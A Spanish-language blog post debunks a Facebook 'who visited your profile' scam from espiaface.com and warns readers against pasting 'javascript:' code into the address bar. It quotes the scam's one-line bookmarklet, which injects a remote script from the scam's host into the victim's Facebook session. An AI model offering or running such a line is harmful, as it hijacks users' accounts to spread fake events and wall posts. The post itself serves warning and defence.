Archivos de Tags: Hacks

Una gran falsedad: Saber quien visitó tu perfil de Facebook

Gracias a mi experiencia como desarrollador web, he podido darme cuenta a tiempo de algunas falsedades que circulan en el Facebook, como por ejemplo, saber quien visitó tu perfíl. Si bien, hay formas de acceder a la información del usuario y hacer algunas acciones como publicar en su muro, pero únicamente por medio de su API. Sin embargo, gente con demasiado tiempo libre con ganas de molestar se ha aprovechado de la inocencia de los usuarios para hacer este tipo de dagas.

Hoy, en mi perfil de facebook me he topado con invitación a un evento que no existe pero que cita a un sitio llamado espiaface.com. Este sitio te proporciona un “manual” para instalar una aplicación y saber quién visitó tu perfil, pero la única forma de hacer eso es:

  • Que Facebook desarrolle un módulo que haga dicha funcionalidad
  • Que Facebook permita al menos insertar una imagen o un código que pueda llamar a una aplicación que utilice el API de Facebook y nos notifique.

Pero como ninguna de los dos existe, pues no hay forma de saber quien visitó tu perfil. Pero si tu eres un usuario que ya cayó en dicha falsedad, no te preocupes ya que “el programita” funciona así:.

Al pedirte que entres al facebook y pongas el siguiente código:

  1. javascript:(a=(b=document).createElement('script')).src='//app.espiaface.com/app.js?'+Math.random(),b.body.appendChild(a);void(0)

Estas ejecutando código Javascript dentro de Facebook, este código es el siguiente: (es muy extenso, así que puedes verlo). Este código te simula una muestra de quien visitó tu perfil y cuantas veces, claro estos parámetros son falsos y toma usuarios al azar. Después te crea un evento para saber quien visitó tu perfil, así mismo te dice que la aplicación está iniciando, cosa que no es cierto. En pocas palabras no se instala ninguna aplicación, solo es un programita que se ejecuta una sola vez por ti.

Sé que no le entiendes al codigo de la linea anterior, pero gracias a una herramienta que se llama JSBeautifier, que te permite comprimir, descomprimir, encriptar y desencriptar código fuente Javascript, entonces el siguiente codigo lo desencriptamos y tenemos el siguiente resultado.

Entonces estoy infectado por un virus o algún ovni controla mi computadora por escritorio remoto?

Bueno tampoco no exageremos, pero descuida, tu computadora no se infectó por algún virus y ningun ovni o entidad extraterrestre controla tu computadora, simplemente fue la ejecución durante un momento de un programa que sin darte cuenta permitiste que hiciera lo que hiso.

Solo hay una cosa a tomar a consideración: no hay ninguna aplicación que te diga exactamente quien visitó tu perfil (y si la hay, escriba un comentario donde la puedo encontrar) y no vuelvas a escribir nada que empiece con “javascript:” en tu barra de dirección del navegador. Estas personas conocen muy bien el funcionamiento de Facebook con Javascript

Espero haberte ayudado. Ahh cierto se me olvidaba, todo lo que hizo el programita tienes que eliminarlo manualmente. Tanto el evento como el mensaje en el muro.

Has llegado a este artículo buscando:

Disfruta compartiendo

  • Print
  • Digg
  • StumbleUpon
  • del.icio.us
  • Facebook
  • Yahoo! Buzz
  • Twitter
  • Google Bookmarks
  • Bitacoras.com
  • email
  • FriendFeed
  • Google Buzz
  • LinkedIn
  • Meneame
  • Posterous
  • Wikio